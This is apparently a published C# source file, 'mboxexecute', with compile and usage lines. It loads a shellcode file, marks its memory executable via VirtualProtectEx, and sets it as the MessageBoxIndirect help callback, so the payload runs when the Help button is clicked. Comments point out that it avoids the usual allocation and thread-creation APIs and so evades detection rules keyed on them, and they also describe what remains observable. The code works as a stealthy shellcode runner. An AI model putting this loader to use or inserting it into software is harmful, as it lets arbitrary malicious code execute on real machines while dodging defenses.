Created
March 7, 2022 16:57
Click help in a message box to execute shellcode
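//Compile: PS C:\> C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe .\mboxexecute.cs
//Usage: PS C:\> .\mboxexecute.exe <path to shellcode>
//References:
// https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-messageboxindirecta
// https://docs.microsoft.com/en-us/windows/win32/api/winuser/ns-winuser-msgboxparamsa
//
// Reviewer summary of what the listing does:
//   1. Reads the file named by args[0] into a managed byte[]; the bytes are not validated.
//   2. Pins the array and changes the protection of its memory to PAGE_EXECUTE_READ (0x20)
//      by calling VirtualProtectEx on the current process.
//   3. Stores the pinned address in MSGBOXPARAMS.lpfnMsgBoxCallback and sets MB_HELP so the
//      message box carries a Help button.
//   4. Shows the box. Per the MSGBOXPARAMS reference above, that field is the callback that
//      processes help events, so the file's bytes run inside this process when Help is used.
//
// Detection notes: the listing makes no allocation call, writes to no other process and
// creates no thread, so rules keyed only on those APIs would presumably not fire. What
// remains observable is (a) a .NET process changing private, non-image memory to an
// executable protection, and (b) user32 transferring control into that same region.
using System;
using System.IO;
using System.Runtime.InteropServices;

namespace mboxexecute
{
    class Program
    {
        // Win32 values, named as in the Windows headers so the listing can be searched for them.
        const uint PAGE_EXECUTE_READ = 0x20;   // memory protection: execute + read, no write
        const uint MB_HELP = 0x00004000;       // message box style: add a Help button
        const int IDOK = 1;                    // MessageBoxIndirect return value for the OK button

        /// <summary>
        /// Entry point: reads the file at args[0], marks its bytes executable and registers
        /// them as the message box help callback.
        /// </summary>
        /// <param name="args">
        /// args[0] is the path of the file to load. With no arguments a usage line is printed
        /// and the process exits with code 0.
        /// </param>
        static void Main(string[] args)
        {
            if (args.Length == 0)
            {
                Console.WriteLine("\n[*] Specify the filepath to shellcode.\n");
                Environment.Exit(0);
            }

            // Throws (unhandled) if the path is missing or unreadable.
            byte[] payload = File.ReadAllBytes(args[0]);

            // Pinning stops the GC from moving the array, so its address stays valid for the
            // native call below. The handle is never freed; the process exits instead.
            GCHandle pinnedPayload = GCHandle.Alloc(payload, GCHandleType.Pinned);
            uint oldProtect = 0;

            if (VirtualProtectEx(GetCurrentProcess(), pinnedPayload.AddrOfPinnedObject(), (UIntPtr)payload.Length, PAGE_EXECUTE_READ, out oldProtect))
            {
                MSGBOXPARAMS boxParams = new MSGBOXPARAMS();
                boxParams.dwStyle = MB_HELP; // Should have an ok button and a help button
                boxParams.lpfnMsgBoxCallback = pinnedPayload.AddrOfPinnedObject(); // "A pointer to the callback function that processes help events for the message box." *chef's kiss*
                boxParams.cbSize = (uint)Marshal.SizeOf(boxParams);

                int mboxResponse;
                do
                {
                    mboxResponse = MessageBoxIndirect(boxParams);
                } while (mboxResponse == IDOK); // Just keep looping until the user clicks "help"; OK only re-shows the box

                Environment.Exit(0);
            }
            else
            {
                // Main returns void, so this failure path also ends with exit code 0.
                Console.WriteLine(" [!] VirtualProtectEx failed.");
            }
        }

        /// <summary>
        /// user32 MessageBoxIndirect (first reference link). CharSet.Auto lets the runtime
        /// choose between the A and W exports.
        /// </summary>
        [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)]
        public static extern int MessageBoxIndirect(MSGBOXPARAMS lbmp);

        /// <summary>
        /// kernel32 VirtualProtectEx. Declared without SetLastError, so the Win32 error code
        /// is not captured when the call fails.
        /// </summary>
        [DllImport("kernel32.dll")]
        static extern bool VirtualProtectEx(IntPtr hProcess, IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);

        /// <summary>kernel32 GetCurrentProcess: handle used to target this process itself.</summary>
        [DllImport("kernel32.dll", SetLastError = true)]
        public static extern IntPtr GetCurrentProcess();

        /// <summary>
        /// Managed mirror of the Win32 MSGBOXPARAMS structure (second reference link), laid
        /// out sequentially for marshalling.
        /// </summary>
        [StructLayout(LayoutKind.Sequential)]
        public struct MSGBOXPARAMS
        {
            public uint cbSize;                 // set from Marshal.SizeOf in Main
            public IntPtr hwndOwner;
            public IntPtr hInstance;
            public string lpszText;
            public string lpszCaption;
            public uint dwStyle;                // Main sets MB_HELP here
            public IntPtr lpszIcon;
            public IntPtr dwContextHelpId;
            public IntPtr lpfnMsgBoxCallback;   // help-event callback; Main points it at the loaded bytes
            public uint dwLanguageId;
        }
    }
}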